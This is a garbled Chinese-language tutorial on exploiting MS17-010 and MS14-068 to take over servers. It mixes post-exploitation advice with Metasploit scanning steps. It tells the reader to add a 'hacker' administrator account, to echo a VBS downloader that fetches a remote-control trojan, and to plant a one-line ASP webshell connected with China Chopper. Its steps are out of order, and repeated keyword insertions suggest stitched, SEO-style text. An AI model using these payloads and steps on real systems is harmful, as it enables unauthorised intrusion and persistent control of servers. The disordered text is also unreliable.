ms17-010 ms14068漏洞利用利用并拿下服务器教程
5)创建用户hacker并加入管理员组
用刚才创建的hacker账户登录
溢出后也不一定要非要在cmdshell下开启远程桌面服务;可以echo一个vbs文件下载远程控制木马,然後在cmdshell里运行一下木马即可连接;还有就是查询目标IP是否绑定有网站如果有则找到网站目录,再用echo个一句话木马进去(命令是:echo "<%execute request("cmd")%>" >
WEB路径/123.asp)鼡中国年菜刀连接,然后上传大马或者上传开3389的工具再开启也行。
文章不是原创只是整理下下方法。主要是考虑到很多企业内网中可能还有很多主机存在问题想方便的探测下可能存在问题的主机,仅需要一个MSF()
第一步:通过msfupdate更噺smb_ms17_010.rb模块,或者手动拷贝附件一到msf的模块目录下
第二步:连接postgresql数据库,不连接的话扫描的信息的信息无法入库连接上后可通过db_status查看状态。
使用db_status确认数据库是否正确连接
探测MS17-010可以先通过smb模块扫描出开放了445端口的主机然后再使用MS17-010模块进行ms14068漏洞利用探测。这种方法适不仅适用於MS17-010ms14068漏洞利用的探测其他的也可以类似。整体来说通过模块联动速度很不错。
第三步:运行smb模块探测主机445端口开放情况
扫描完成后,掃描的信息会自动存入数据库可通过hosts命令查看
扫描之前可通过info查看配置详情。